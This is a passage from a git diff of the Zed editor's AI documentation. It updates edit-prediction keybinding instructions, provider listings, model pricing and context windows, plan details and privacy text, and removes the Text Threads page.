you can also use the `tab` key to accept edit predictions, unless the completion menu is open, in which case `tab` accepts LSP completions. To use `tab` to insert whitespace, you need to dismiss the prediction with {#kb editor::Cancel} before hitting `tab`. {#action editor::AcceptNextWordEditPrediction} ({#kb editor::AcceptNextWordEditPrediction}) can be used to accept the current edit prediction up to the next word boundary. {#action editor::AcceptNextLineEditPrediction} ({#kb editor::AcceptNextLineEditPrediction}) can be used to accept the current edit prediction up to the new line boundary. ## Configuring Edit Prediction Keybindings {#edit-predictions-keybinding} -By default, `tab` is used to accept edit predictions. You can use another keybinding by inserting this in your keymap: - -```json [keymap] -{ - "context": "Editor && edit_prediction", - "bindings": { - // Here we also allow `alt-enter` to accept the prediction - "alt-enter": "editor::AcceptEditPrediction" - } -} -``` - -When there's a [conflict with the `tab` key](#edit-predictions-conflict), Zed uses a different key context to accept keybindings (`edit_prediction_conflict`). -If you want to use a different one, you can insert this in your keymap: - -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict", - "bindings": { - "ctrl-enter": "editor::AcceptEditPrediction" // Example of a modified keybinding - } -} -``` - -If your keybinding contains a modifier (`ctrl` in the example above), it will also be used to preview the edit prediction and temporarily hide the language server completion menu. - -You can also bind this action to keybind without a modifier. -In that case, Zed will use the default modifier (`alt`) to preview the edit prediction. - -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict", - "bindings": { - // Here we bind tab to accept even when there's a language server completion - // or the cursor isn't at the correct indentation level - "tab": "editor::AcceptEditPrediction" - } -} -``` - -To maintain the use of the modifier key for accepting predictions when there is a language server completions menu, but allow `tab` to accept predictions regardless of cursor position, you can specify the context further with `showing_completions`: - -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict && !showing_completions", - "bindings": { - // Here we don't require a modifier unless there's a language server completion - "tab": "editor::AcceptEditPrediction" - } -} -``` - ### Keybinding Example: Always Use Tab -If you want to use `tab` to always accept edit predictions, you can use the following keybinding: +To always use `tab` for accepting edit predictions, regardless of whether the LSP completions menu is open, you can add the following to your keymap: -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict && showing_completions", - "bindings": { - "tab": "editor::AcceptEditPrediction" - } -} -``` +Open the keymap editor with {#action zed::OpenKeymap} ({#kb zed::OpenKeymap}), search for `AcceptEditPrediction`, right click on the binding for `tab` and hit `edit`. Then change the context the binding is active in to just `Editor && edit_prediction` and save it. -This will make `tab` work to accept edit predictions _even when_ you're also seeing language server completions. -That means that you need to rely on `enter` for accepting the latter. - -### Keybinding Example: Always Use Alt-Tab - -The keybinding example below causes `alt-tab` to always be used instead of sometimes using `tab`. -You might want this in order to have just one (alternative) keybinding to use for accepting edit predictions, since the behavior of `tab` varies based on context. +Alternatively, you can put the following in your `keymap.json`: ```json [keymap] +[ { "context": "Editor && edit_prediction", "bindings": { - "alt-tab": "editor::AcceptEditPrediction" - } - }, - // Bind `tab` back to its original behavior. - { - "context": "Editor", - "bindings": { - "tab": "editor::Tab" + "tab": "editor::AcceptEditPrediction" } - }, - { - "context": "Editor && showing_completions", - "bindings": { - "tab": "editor::ComposeCompletion" - } - }, + } +] ``` -If you are using [Vim mode](../vim.md), then additional bindings are needed after the above to return `tab` to its original behavior: +After that, {#kb editor::ComposeCompletion} remains available for accepting LSP completions. -```json [keymap] - { - "context": "(VimControl && !menu) || vim_mode == replace || vim_mode == waiting", - "bindings": { - "tab": "vim::Tab" - } - }, - { - "context": "vim_mode == literal", - "bindings": { - "tab": ["vim::Literal", ["tab", "\u0009"]] - } - }, -``` +### Keybinding Example: Always Use Alt-Tab + +To stop using `tab` for accepting edit predictions and always use `alt-tab` instead, unbind the default `tab` binding in the eager edit prediction context: -### Keybinding Example: Displaying Tab and Alt-Tab on Linux +Open the keymap editor with {#action zed::OpenKeymap} ({#kb zed::OpenKeymap}), search for `AcceptEditPrediction`, right click on the binding for `tab` and delete it. -While `tab` and `alt-tab` are supported on Linux, `alt-l` is displayed instead. -If your window manager does not reserve `alt-tab`, and you would prefer to use `tab` and `alt-tab`, include these bindings in `keymap.json`: +Alternatively, you can put the following in your `keymap.json`: ```json [keymap] +[ { "context": "Editor && edit_prediction", - "bindings": { - "tab": "editor::AcceptEditPrediction", - // Optional: This makes the default `alt-l` binding do nothing. - "alt-l": null + "unbind": { + "tab": "editor::AcceptEditPrediction" } - }, - { - "context": "Editor && edit_prediction_conflict", - "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - // Optional: This makes the default `alt-l` binding do nothing. - "alt-l": null - } - }, + } +] ``` -### Missing keybind {#edit-predictions-missing-keybinding} +After that, `alt-tab` remains available for accepting edit predictions, and on Linux `alt-l` does too unless you unbind it. -Zed requires at least one keybinding for the {#action editor::AcceptEditPrediction} action in both the `Editor && edit_prediction` and `Editor && edit_prediction_conflict` contexts ([learn more above](#edit-predictions-keybinding)). +### Keybinding Example: Rebind Both Tab and Alt-Tab -If you have previously bound the default keybindings to different actions in the global context, you will not be able to preview or accept edit predictions. For example: +To move both default accept bindings to something else, unbind them and add your replacement: -```json [keymap] -[ - // Your keymap - { - "bindings": { - // Binds `alt-tab` to a different action globally - "alt-tab": "menu::SelectNext" - } - } -] -``` +Open the keymap editor with {#action zed::OpenKeymap} ({#kb zed::OpenKeymap}), search for `AcceptEditPrediction`, right click on the binding for `tab` and delete it. Then right click on the binding for `alt-tab`, select "Edit", and record your desired keystrokes before hitting saving. -To fix this, you can specify your own keybinding for accepting edit predictions: +Alternatively, you can put the following in your `keymap.json`: ```json [keymap] [ - // ... { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction", + "unbind": { + "alt-tab": "editor::AcceptEditPrediction", + // Add this as well on Windows/Linux + // "alt-l": "editor::AcceptEditPrediction", + "tab": "editor::AcceptEditPrediction" + }, "bindings": { - "alt-l": "editor::AcceptEditPrediction" + "ctrl-enter": "editor::AcceptEditPrediction" } } ] ``` -If you would like to use the default keybinding, you can free it up by either moving yours to a more specific context or changing it to something else. +In this case, because the binding contains the modifier `ctrl`, it will be used to preview the prediction in subtle mode, or when the completions menu is open. + +### Cleaning Up Older Keymap Entries + +If you configured edit prediction keybindings before Zed `v0.229.0`, your `keymap.json` may have entries that are now redundant. + +**Old tab workaround**: Before `unbind` existed, the only way to prevent `tab` from accepting edit predictions was to copy all the default non-edit-prediction `tab` bindings into your keymap alongside a custom `AcceptEditPrediction` binding. If your keymap still contains those copy-pasted entries, delete them and use a single `"unbind"` entry as shown in the examples above. + +**Renamed context**: The `edit_prediction_conflict` context has been replaced by `edit_prediction && (showing_completions || in_leading_whitespace)`. Zed automatically migrates any bindings that used `edit_prediction_conflict`, so no changes are required on your end. ## Disabling Automatic Edit Prediction @@ -329,8 +233,8 @@ If your organization uses GitHub Copilot Enterprise, you can configure Zed to us Replace `"https://your.enterprise.domain"` with the URL provided by your GitHub Enterprise administrator (e.g., `https://foo.ghe.com`). -Once set, Zed will route Copilot requests through your enterprise endpoint. -When you sign in by clicking the Copilot icon in the status bar, you will be redirected to your configured enterprise URL to complete authentication. +Once set, Zed routes Copilot requests through your enterprise endpoint. +When you sign in by clicking the Copilot icon in the status bar, you are redirected to your configured enterprise URL to complete authentication. All other Copilot features and usage remain the same. Copilot can provide multiple completion alternatives, and these can be navigated with the following actions: @@ -338,33 +242,11 @@ Copilot can provide multiple completion alternatives, and these can be navigated - {#action editor::NextEditPrediction} ({#kb editor::NextEditPrediction}): To cycle to the next edit prediction - {#action editor::PreviousEditPrediction} ({#kb editor::PreviousEditPrediction}): To cycle to the previous edit prediction -### Sweep {#sweep} - -To use [Sweep](https://sweep.dev/) as your provider: - -1. Open the Settings Editor (`Cmd+,` on macOS, `Ctrl+,` on Linux/Windows) -2. Search for "Edit Predictions" and click **Configure Providers** -3. Find the Sweep section and enter your API key from the - [Sweep dashboard](https://app.sweep.dev/) - -Alternatively, click the edit prediction icon in the status bar and select -**Configure Providers** from the menu. - -After adding your API key, Sweep will appear in the provider dropdown in the status bar menu, where you can select it. You can also set it directly in your settings file: - -```json [settings] -{ - "edit_predictions": { - "provider": "sweep" - } -} -``` - ### Mercury Coder {#mercury-coder} To use [Mercury Coder](https://www.inceptionlabs.ai/) by Inception Labs as your provider: -1. Open the Settings Editor (`Cmd+,` on macOS, `Ctrl+,` on Linux/Windows) +1. Open the Settings Editor ({#kb zed::OpenSettings}) 2. Search for "Edit Predictions" and click **Configure Providers** 3. Find the Mercury section and enter your API key from the [Inception Labs dashboard](https://platform.inceptionlabs.ai/dashboard/api-keys) @@ -406,8 +288,6 @@ After adding your API key, Codestral will appear in the provider dropdown in the ### Self-Hosted OpenAI-compatible servers -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - You can use any self-hosted server that implements the OpenAI completion API format. This works with vLLM, llama.cpp server, LocalAI, and other compatible servers. #### Configuration diff --git a/docs/src/ai/external-agents.md b/docs/src/ai/external-agents.md index 7a76e795f127651201a6483986ebbc917088bf96..dc3b246f34f28a7a0560992e64b1918f2fe69a9e 100644 --- a/docs/src/ai/external-agents.md +++ b/docs/src/ai/external-agents.md @@ -9,6 +9,8 @@ Zed supports many external agents, including CLI-based ones, through the [Agent Zed supports [Gemini CLI](https://github.com/google-gemini/gemini-cli) (the reference ACP implementation), [Claude Agent](https://platform.claude.com/docs/en/agent-sdk/overview), [Codex](https://developers.openai.com/codex), [GitHub Copilot](https://github.com/github/copilot-language-server-release), and [additional agents](#add-more-agents) you can configure. +For Zed's built-in agent and the full list of tools it can use natively, see [Agent Tools](./tools.md). + > Note that Zed's interaction with external agents is strictly UI-based; the billing, legal, and terms arrangement is directly between you and the agent provider. > Zed does not charge for use of external agents, and our [zero-data retention agreements/privacy guarantees](./ai-improvement.md) are **_only_** applicable for Zed's hosted models. diff --git a/docs/src/ai/inline-assistant.md b/docs/src/ai/inline-assistant.md index f1391f8d58dc8746bceece6bcfa3ce091ea4785f..f560451dbbbac11b34910f9512c7fc7a0ad54853 100644 --- a/docs/src/ai/inline-assistant.md +++ b/docs/src/ai/inline-assistant.md @@ -7,7 +7,7 @@ description: Transform code inline with AI in Zed. Send selections to any LLM fo ## Usage Overview -Use {#kb assistant::InlineAssist} to open the Inline Assistant in editors, text threads, the rules library, channel notes, and the terminal panel. +Use {#kb assistant::InlineAssist} to open the Inline Assistant in editors, the rules library, channel notes, and the terminal panel. The Inline Assistant sends your current selection (or line) to a language model and replaces it with the response. diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index 3a32bd96e73d9df427897798681f203c4ceb2273..7c34d13e9616bbcf9482f6f8a79699ad7e2f96ff 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -5,7 +5,7 @@ description: Bring your own API keys to Zed. Set up Anthropic, OpenAI, Google AI # LLM Providers -To use AI in Zed, you need to have at least one large language model provider set up. Once configured, providers are available in the [Agent Panel](./agent-panel.md), [Inline Assistant](./inline-assistant.md), and [Text Threads](./text-threads.md). +To use AI in Zed, you need to have at least one large language model provider set up. Once configured, providers are available in the [Agent Panel](./agent-panel.md) and [Inline Assistant](./inline-assistant.md). You can do that by either subscribing to [one of Zed's plans](./plans-and-usage.md), or by using API keys you already have for the supported providers. For general AI setup, see [Configuration](./configuration.md). @@ -88,7 +88,7 @@ With that done, choose one of the three authentication methods: While it's possible to configure through the Agent Panel settings UI by entering your AWS access key and secret directly, we recommend using named profiles instead for better security practices. To do this: -1. Create an IAM User that you can assume in the [IAM Console](https://us-east-1.console.aws.amazon.com/iam/home?region=us-east-1#/users). +1. Create an IAM User in the [IAM Console](https://us-east-1.console.aws.amazon.com/iam/home?region=us-east-1#/users). 2. Create security credentials for that User, save them and keep them secure. 3. Open the Agent Configuration with (`agent: open settings`) and go to the Amazon Bedrock section 4. Copy the credentials from Step 2 into the respective **Access Key ID**, **Secret Access Key**, and **Region** fields. @@ -152,8 +152,6 @@ For the most up-to-date supported regions and models, refer to the [Supported Mo #### Extended Context Window {#bedrock-extended-context} -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - Anthropic models on Bedrock support a 1M token extended context window through the `anthropic_beta` API parameter. To enable this feature, set `"allow_extended_context": true` in your Bedrock configuration: ```json [settings] @@ -173,8 +171,6 @@ Zed enables extended context for supported models (Claude Sonnet 4.5 and Claude #### Image Support {#bedrock-image-support} -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - Bedrock models that support vision (Claude 3 and later, Amazon Nova Pro and Lite, Meta Llama 3.2 Vision models, Mistral Pixtral) can receive images in conversations and tool results. ### Anthropic {#anthropic} @@ -630,8 +626,6 @@ The OpenRouter API key will be saved in your keychain. Zed will also use the `OPENROUTER_API_KEY` environment variable if it's defined. -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When using OpenRouter as your assistant provider, you must explicitly select a model in your settings. OpenRouter no longer provides a default model selection. Configure your preferred OpenRouter model in `settings.json`: diff --git a/docs/src/ai/mcp.md b/docs/src/ai/mcp.md index 08608a9871b7f826c4789bf2213cd7fdd6d624bb..cba02eab4da9c66ed360e0599bc52862c242c180 100644 --- a/docs/src/ai/mcp.md +++ b/docs/src/ai/mcp.md @@ -56,6 +56,9 @@ You can connect them by adding their commands directly to your settings file ([h "remote-mcp-server": { "url": "custom", "headers": { "Authorization": "Bearer " } + }, + "remote-mcp-server-with-oauth": { + "url": "https://mcp.example.com/mcp" } } } @@ -64,6 +67,8 @@ You can connect them by adding their commands directly to your settings file ([h Alternatively, you can also add a custom server by accessing the Agent Panel's Settings view (also accessible via the `agent: open settings` action). From there, you can add it through the modal that appears when you click the "Add Custom Server" button. +> Note: When a remote MCP server has no configured `"Authorization"` header, Zed will prompt you to authenticate yourself against the MCP server using the standard MCP OAuth flow. + ## Using MCP Servers ### Configuration Check diff --git a/docs/src/ai/models.md b/docs/src/ai/models.md index a86b873ef8aff112ceddbe7da000e4350023ec42..ebd35041f7456fec314886d3b554730e1de83d7f 100644 --- a/docs/src/ai/models.md +++ b/docs/src/ai/models.md @@ -43,10 +43,6 @@ Zed's plans offer hosted versions of major LLMs with higher rate limits than dir | | OpenAI | Cached Input | $0.005 | $0.0055 | | Gemini 3.1 Pro | Google | Input | $2.00 | $2.20 | | | Google | Output | $12.00 | $13.20 | -| Gemini 3.1 Pro | Google | Input | $2.00 | $2.20 | -| | Google | Output | $12.00 | $13.20 | -| Gemini 3 Pro | Google | Input | $2.00 | $2.20 | -| | Google | Output | $12.00 | $13.20 | | Gemini 3 Flash | Google | Input | $0.30 | $0.33 | | | Google | Output | $2.50 | $2.75 | | Grok 4 | X.ai | Input | $3.00 | $3.30 | @@ -70,7 +66,8 @@ As of February 19, 2026, Zed Pro serves newer model versions in place of the ret - Claude Sonnet 4 → Claude Sonnet 4.5 or Claude Sonnet 4.6 - Claude Sonnet 3.7 (retired Feb 19) → Claude Sonnet 4.5 or Claude Sonnet 4.6 - GPT-5.1 and GPT-5 → GPT-5.2 or GPT-5.2 Codex -- Gemini 2.5 Pro → Gemini 3 Pro or Gemini 3.1 Pro +- Gemini 2.5 Pro → Gemini 3.1 Pro +- Gemini 3 Pro → Gemini 3.1 Pro - Gemini 2.5 Flash → Gemini 3 Flash ## Usage {#usage} @@ -86,21 +83,20 @@ A context window is the maximum span of text and code an LLM can consider at onc | Model | Provider | Zed-Hosted Context Window | | ----------------- | --------- | ------------------------- | | Claude Opus 4.5 | Anthropic | 200k | -| Claude Opus 4.6 | Anthropic | 200k | +| Claude Opus 4.6 | Anthropic | 1M | | Claude Sonnet 4.5 | Anthropic | 200k | -| Claude Sonnet 4.6 | Anthropic | 200k | +| Claude Sonnet 4.6 | Anthropic | 1M | | Claude Haiku 4.5 | Anthropic | 200k | | GPT-5.2 | OpenAI | 400k | | GPT-5.2 Codex | OpenAI | 400k | | GPT-5 mini | OpenAI | 400k | | GPT-5 nano | OpenAI | 400k | | Gemini 3.1 Pro | Google | 200k | -| Gemini 3 Pro | Google | 200k | | Gemini 3 Flash | Google | 200k | -> Context window limits for hosted Sonnet 4.5/4.6 and Gemini 3.1 Pro/3 Pro/Flash may increase in future releases. +> Context window limits for hosted Gemini 3.1 Pro/3 Pro/Flash may increase in future releases. -Each Agent thread and text thread in Zed maintains its own context window. +Each Agent thread in Zed maintains its own context window. The more prompts, attached files, and responses included in a session, the larger the context window grows. Start a new thread for each distinct task to keep context focused. diff --git a/docs/src/ai/overview.md b/docs/src/ai/overview.md index b05b3ac6a7a3c9ce42e226e75d5e9e28420f8b03..7ea435975ec5ba12f68a7a3ad19007fd65ba65e8 100644 --- a/docs/src/ai/overview.md +++ b/docs/src/ai/overview.md @@ -28,11 +28,7 @@ The [Inline Assistant](./inline-assistant.md) works differently: select code or [Edit Prediction](./edit-prediction.md) provides AI code completions on every keystroke. Each keypress sends a request to the prediction provider, which returns single or multi-line suggestions you accept with `tab`. -The default provider is Zeta, Zed's open-source model trained on open data. You can also use GitHub Copilot, Supermaven, or Codestral. - -## Text threads - -[Text Threads](./text-threads.md) are conversations with models inside any buffer. They work like a regular editor with your keybindings, multiple cursors, and standard editing features. Content is organized into message blocks with roles (You, Assistant, System). +The default provider is Zeta, Zed's open-source model trained on open data. You can also use GitHub Copilot, or Codestral. ## Getting started diff --git a/docs/src/ai/plans-and-usage.md b/docs/src/ai/plans-and-usage.md index bebc4c4fb30dab6379a645209d21eccda65459d5..bc9e4854475799938dc7383e29edd84bf9493a66 100644 --- a/docs/src/ai/plans-and-usage.md +++ b/docs/src/ai/plans-and-usage.md @@ -7,9 +7,9 @@ description: Understand Zed's AI plans, token-based usage metering, spend limits ## Available Plans {#plans} -For costs and more information on pricing, visit [Zed’s pricing page](https://zed.dev/pricing). +For costs and more information on pricing, visit [Zed's pricing page](https://zed.dev/pricing). -Zed works without AI features or a subscription. No [authentication](../authentication.md) required for the editor itself. +Zed works without AI features or a subscription. No [authentication](../authentication.md) is required for the editor itself. ## Usage {#usage} @@ -17,6 +17,8 @@ Usage of Zed's hosted models is measured on a token basis, converted to dollars Zed Pro comes with $5 of monthly dollar credit. A trial of Zed Pro includes $20 of credit, usable for 14 days. Monthly included credit resets on your monthly billing date. +The [Zed Student plan](https://zed.dev/education) includes $10/month in token credits. The Student plan is available free for one year to verified university students. + To view your current usage, you can visit your account at [dashboard.zed.dev/account](https://dashboard.zed.dev/account). Information from our metering and billing provider, Orb, is embedded on that page. ## Spend Limits {#usage-spend-limits} @@ -25,7 +27,9 @@ At the top of [the Account page](https://dashboard.zed.dev/account), you'll find The default value for all Pro users is $10, for a total monthly spend with Zed of $20 ($10 for your Pro subscription, $10 in incremental token spend). This can be set to $0 to limit your spend with Zed to exactly $10/month. If you adjust this limit _higher_ than $10 and consume more than $10 of incremental token spend, you'll be billed via [threshold billing](./billing.md#threshold-billing). -Once the spend limit is hit, we’ll stop any further usage until your token spend limit resets. +Once the spend limit is hit, we'll stop any further usage until your token spend limit resets. + +> **Note:** Spend limits are a Zed Pro feature. Student plan users do not currently have the ability to configure spend limits; usage is capped at the $10/month included credit. ## Business Usage {#business-usage} diff --git a/docs/src/ai/privacy-and-security.md b/docs/src/ai/privacy-and-security.md index 5eac8a43268865920825557aa8f5a20ec9e04839..828953cca74868b097490dfafcb318b8245a2ef8 100644 --- a/docs/src/ai/privacy-and-security.md +++ b/docs/src/ai/privacy-and-security.md @@ -1,21 +1,23 @@ --- title: AI Privacy and Security - Zed -description: Zed's approach to AI privacy: opt-in data sharing by default, zero-data retention with providers, and full open-source transparency. +description: "Zed's approach to AI privacy: opt-in data sharing by default, zero-data retention with providers, and full open-source transparency." --- # Privacy and Security ## Philosophy -Zed aims to collect only the minimum data necessary to serve and improve our product. +Zed collects minimal data necessary to serve and improve our product. Features that could share data, like AI and telemetry, are either opt-in or can be disabled. -Data sharing is opt-in by default. Privacy is not a setting to toggle—it's the baseline. +- **Telemetry**: Zed collects only the data necessary to understand usage and fix issues. Client-side telemetry can be disabled in settings. -As an open-source product, we believe in maximal transparency, and invite you to examine our codebase. If you find issues, we encourage you to share them with us. +- **AI**: Data sharing for AI improvement is opt-in, and each share is a one-time action; it does not grant permission for future data collection. You can use Zed's AI features without sharing any data with Zed and without authenticating. -Zed, including AI features, works without sharing data with us and without authentication. +- **Open-Source**: Zed's codebase is public. You can inspect exactly what data is collected and how it's handled. If you find issues, we encourage you to report them. -## Documentation +- **Secure-by-default**: Designing Zed and our Service with "secure-by-default" as an objective is of utmost importance to us. We take your security and ours very seriously and strive to follow industry best-practice in order to uphold that principle. + +## Related Documentation - [Tool Permissions](./tool-permissions.md): Configure granular rules to control which agent actions are auto-approved, blocked, or require confirmation. @@ -23,16 +25,15 @@ Zed, including AI features, works without sharing data with us and without authe - [Telemetry](../telemetry.md): How Zed collects general telemetry data. -- [AI Improvement](./ai-improvement.md): Zed's opt-in-only approach to data collection for AI improvement, whether our Agentic offering or Edit Predictions. +- [Zed AI Features and Privacy](./ai-improvement.md): An overview of Zed's AI features, your data when using AI in Zed, and how to opt-in and help Zed improve these features. - [Accounts](../authentication.md): When and why you'd need to authenticate into Zed, how to do so, and what scope we need from you. -- [Collab](https://zed.dev/faq#data-and-privacy): How Zed's live collaboration works, and how data flows to provide the experience (we don't store your code). +- [Collab](https://zed.dev/faq#data-and-privacy): How Zed's live collaboration works and how data flows. Zed does not store your code. ## Legal Links -- [Terms of Service](https://zed.dev/terms-of-service) -- [Terms of Use](https://zed.dev/terms) +- [Terms of Service](https://zed.dev/terms) - [Privacy Policy](https://zed.dev/privacy-policy) - [Zed's Contributor License and Feedback Agreement](https://zed.dev/cla) - [Subprocessors](https://zed.dev/subprocessors) diff --git a/docs/src/ai/rules.md b/docs/src/ai/rules.md index 6a23673e824435d129b0230a55f090e8ddd73e0a..1fb47aa562d0b733bb0333e3c571430488c2503c 100644 --- a/docs/src/ai/rules.md +++ b/docs/src/ai/rules.md @@ -74,11 +74,4 @@ The new rules system replaces the Prompt Library except in a few specific cases, ### Slash Commands in Rules Previously, it was possible to use slash commands (now @-mentions) in custom prompts (now rules). -There is currently no support for using @-mentions in rules files, however, slash commands are supported in rules files when used with text threads. -See the documentation for using [slash commands in rules](./text-threads.md#slash-commands-in-rules) for more information. - -### Prompt templates - -Zed maintains backwards compatibility with its original template system, which allows you to customize prompts used throughout the application, including the inline assistant. -While the Rules Library is now the primary way to manage prompts, you can still use these legacy templates to override default prompts. -For more details, see the [Rules Templates](./text-threads.md#rule-templates) section under [Text Threads](./text-threads.md). +There is currently no support for using @-mentions in rules files. diff --git a/docs/src/ai/text-threads.md b/docs/src/ai/text-threads.md index 82ea45510edcd1a74e21477333f6633cd800f217..2315666460fd645f182bd6ff0934c5c1c9f18873 100644 --- a/docs/src/ai/text-threads.md +++ b/docs/src/ai/text-threads.md @@ -1,261 +1,13 @@ --- -title: AI Chat in Your Editor - Zed Text Threads -description: Chat with LLMs directly in your editor with Zed's text threads. Full control over context, message roles, and slash commands. +title: Text Threads (Removed) +description: Text threads have been removed from Zed. Use the Agent Panel for all AI conversations. +redirect_to: ./agent-panel.md --- # Text Threads -Text threads in the [Agent Panel](./agent-panel.md) work like a regular editor. -You can use custom keybindings, multiple cursors, and all the standard editing features while chatting. +Text threads have been removed from Zed. -## Text Threads vs. Threads +All AI conversations now happen through the [Agent Panel](./agent-panel.md), which supports agentic workflows including tool calls, file editing, terminal access, and [external agents](./external-agents.md). -Text Threads were Zed's original AI interface. -In May 2025, Zed introduced the current [Agent Panel](./agent-panel.md), designed for agentic workflows. - -The key difference: text threads don't support tool calls and many other more modern agentic features. -They can't autonomously read files, write code, or run commands on your behalf. -Text Threads are for simpler conversational interactions where you send text and receive text responses back. - -Therefore, [MCP servers](./mcp.md) and [external agents](./external-agents.md) are also not available in Text Threads. - -## Usage Overview - -Text threads organize content into message blocks with roles: - -- `You` -- `Assistant` -- `System` - -To begin, type your message in a `You` block. -As you type, the remaining token count for the selected model updates automatically. - -To add context from an editor, highlight text and run `agent: add selection to thread` ({#kb agent::AddSelectionToThread}). -If the selection is code, Zed will wrap it in a fenced code block. - -To submit a message, use {#kb assistant::Assist} (`assistant: assist`). -In text threads, {#kb editor::Newline} inserts a new line instead of submitting, which preserves standard editor behavior. - -After you submit a message, the response is streamed below in an `Assistant` message block. -You can cancel the stream at any point with escape, or start a new conversation at any time via cmd-n|ctrl-n. - -Text threads support straightforward conversations, but you can also go back and edit earlier messages—including previous LLM responses—to change direction, refine context, or correct mistakes without starting a new thread or spending tokens on follow-up corrections. -If you want to remove a message block entirely, place your cursor at the beginning of the block and use the `delete` key. - -A typical workflow might involve making edits and adjustments throughout the context to refine your inquiry or provide additional information. -Here's an example: - -1. Write text in a `You` block. -2. Submit the message with {#kb assistant::Assist}. -3. Receive an `Assistant` response that doesn't meet your expectations. -4. Cancel the response with escape. -5. Erase the content of the `Assistant` message block and remove the block entirely. -6. Add additional context to your original message. -7. Submit the message with {#kb assistant::Assist}. - -You can also cycle the role of a message block by clicking on the role, which is useful when you receive a response in an `Assistant` block that you want to edit and send back up as a `You` block. - -## Commands Overview {#commands} - -Type `/` at the beginning of a line to see available slash commands: - -- `/default`: Inserts the default rule -- `/diagnostics`: Injects errors reported by the project's language server -- `/fetch`: Fetches the content of a webpage and inserts it -- `/file`: Inserts a single file or a directory of files -- `/now`: Inserts the current date and time -- `/prompt`: Adds a custom-configured prompt to the context ([see Rules Library](./rules.md#rules-library)) -- `/symbols`: Inserts the current tab's active symbols -- `/tab`: Inserts the content of the active tab or all open tabs -- `/terminal`: Inserts a select number of lines of output from the terminal -- `/selection`: Inserts the selected text - -> **Note:** Remember, commands are only evaluated when the text thread is created or when the command is inserted, so a command like `/now` won't continuously update, or `/file` commands won't keep their contents up to date. - -### `/default` - -Read more about `/default` in the [Rules: Editing the Default Rules](./rules.md#default-rules) section. - -Usage: `/default` - -### `/diagnostics` - -Injects errors reported by the project's language server into the context. - -Usage: `/diagnostics [--include-warnings] [path]` - -- `--include-warnings`: Optional flag to include warnings in addition to errors. -- `path`: Optional path to limit diagnostics to a specific file or directory. - -### `/file` - -Inserts the content of a file or directory into the context. Supports glob patterns. - -Usage: `/file ` - -Examples: - -- `/file src/index.js` - Inserts the content of `src/index.js` into the context. -- `/file src/*.js` - Inserts the content of all `.js` files in the `src` directory. -- `/file src` - Inserts the content of all files in the `src` directory. - -### `/now` - -Inserts the current date and time. Useful for informing the model about its knowledge cutoff relative to now. - -Usage: `/now` - -### `/prompt` - -Inserts a rule from the Rules Library into the context. Rules can nest other rules. - -Usage: `/prompt ` - -Related: `/default` - -### `/symbols` - -Inserts the active symbols (functions, classes, etc.) from the current tab, providing a structural overview of the file. - -Usage: `/symbols` - -### `/tab` - -Inserts the content of the active tab or all open tabs. - -Usage: `/tab [tab_name|all]` - -- `tab_name`: Optional name of a specific tab to insert. -- `all`: Insert content from all open tabs. - -Examples: - -- `/tab` - Inserts the content of the active tab. -- `/tab "index.js"` - Inserts the content of the tab named "index.js". -- `/tab all` - Inserts the content of all open tabs. - -### `/terminal` - -Inserts recent terminal output (default: 50 lines). - -Usage: `/terminal []` - -- ``: Optional parameter to specify the number of lines to insert (default is 50). - -### `/selection` - -Inserts the currently selected text. Equivalent to `agent: add selection to thread` ({#kb agent::AddSelectionToThread}). - -Usage: `/selection` - -## Commands in the Rules Library {#slash-commands-in-rules} - -[Commands](#commands) can be used in rules, in the Rules Library (previously known as Prompt Library), to insert dynamic content or perform actions. -For example, if you want to create a rule where it is important for the model to know the date, you can use the `/now` command to insert the current date. - -
- -Slash commands in rules **only** work when they are used in text threads. Using them in non-text threads is not supported. - -
- -> **Note:** Slash commands in rules **must** be on their own line. - -See the [list of commands](#commands) above for more information on commands, and what slash commands are available. - -### Example - -```plaintext -You are an expert Rust engineer. The user has asked you to review their project and answer some questions. - -Here is some information about their project: - -/file Cargo.toml -``` - -In the above example, the `/file` command is used to insert the contents of the `Cargo.toml` file (or all `Cargo.toml` files present in the project) into the rule. - -## Nesting Rules - -Similar to adding rules to the default rules, you can nest rules within other rules with the `/prompt` command (only supported in Text Threads currently). - -You might want to nest rules to: - -- Create templates on the fly -- Break collections like docs or references into smaller, mix-and-matchable parts -- Create variants of a similar rule (e.g., `Async Rust - Tokio` vs. `Async Rust - Async-std`) - -### Example - -```plaintext -Title: Zed-Flavored Rust - -## About Zed - -/prompt Zed: Zed (a rule about what Zed is) - -## Rust - Zed Style - -/prompt Rust: Async - Async-std (zed doesn't use tokio) -/prompt Rust: Zed-style Crates (we have some unique conventions) -/prompt Rust - Workspace deps (bias towards reusing deps from the workspace) -``` - -_The text in parentheses above are comments and are not part of the rule._ - -> **Note:** You can technically nest a rule within itself, but we don't recommend doing so. - -By using nested rules, you can create modular and reusable rule components that can be combined in various ways to suit different scenarios. - -> **Note:** When using slash commands to bring in additional context, the injected content can be edited directly inline in the text thread—edits here will not propagate to the saved rules. - -## Extensibility - -Additional slash commands can be provided by extensions. - -See [Extension: Slash Commands](../extensions/slash-commands.md) to learn how to create your own. - -## Advanced Concepts - -### Rule Templates {#rule-templates} - -Zed uses rule templates to power internal assistant features, like the terminal assistant, or the content rules used in the inline assistant. - -Zed has the following internal rule templates: - -- `content_prompt.hbs`: Used for generating content in the editor. -- `terminal_assistant_prompt.hbs`: Used for the terminal assistant feature. - -At this point it is unknown if we will expand templates further to be user-creatable. - -### Overriding Templates - -> **Note:** It is not recommended to override templates unless you know what you are doing. Editing templates will break your assistant if done incorrectly. - -Zed allows you to override the default rules used for various assistant features by placing custom Handlebars (.hbs) templates in your `~/.config/zed/prompt_overrides` directory. - -The following templates can be overridden: - -1. [`content_prompt.hbs`](https://github.com/zed-industries/zed/tree/main/assets/prompts/content_prompt.hbs): Used for generating content in the editor. - -2. [`terminal_assistant_prompt.hbs`](https://github.com/zed-industries/zed/tree/main/assets/prompts/terminal_assistant_prompt.hbs): 